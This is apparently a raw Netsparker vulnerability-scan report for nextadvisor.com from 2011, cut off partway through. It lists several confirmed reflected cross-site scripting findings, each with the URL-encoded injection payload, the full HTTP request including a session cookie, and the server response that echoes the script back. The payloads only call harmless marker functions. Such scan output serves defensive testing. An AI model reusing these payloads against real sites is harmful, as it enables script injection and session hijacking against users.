src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000200)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_dvd_rental_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online DVD Rental FAQ</h1> <p>Frequently Asked Questions about Online DVD Rental</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online DVD Rental:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_dvd_rental_services"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008..
- /genealogy/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00021D)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00021D)%3C/script%3E

/genealogy/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00021D)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00021D)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/genealogy/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetspark..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00021D)</script>

Request

GET /genealogy/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00021D)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/genealogy/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:27 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6431
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", genealogy, genealogy research, family tree, family line, ancestors, , Ancestry.com, Archives.com, Footnote.com, Onegreatfamily.com, FamilyBuilder.com" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/genealogy/index.php'"--></style></script><script>netsparker(0x00021D)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x00021D)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/genealogy_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Genealogy FAQ</h1> <p>Frequently Asked Questions about Genealogy</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Genealogy:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="genealogy"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blo..
- /genealogy/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000222)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000222)%3C/script%3E

/genealogy/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000222)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000222)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/genealogy/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000222)</script>

Request

GET /genealogy/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000222)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/genealogy/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:28 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6414
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", genealogy, genealogy research, family tree, family line, ancestors, , Ancestry.com, Archives.com, Footnote.com, Onegreatfamily.com, FamilyBuilder.com" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/genealogy/'"--></style></script><script>netsparker(0x000222)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit 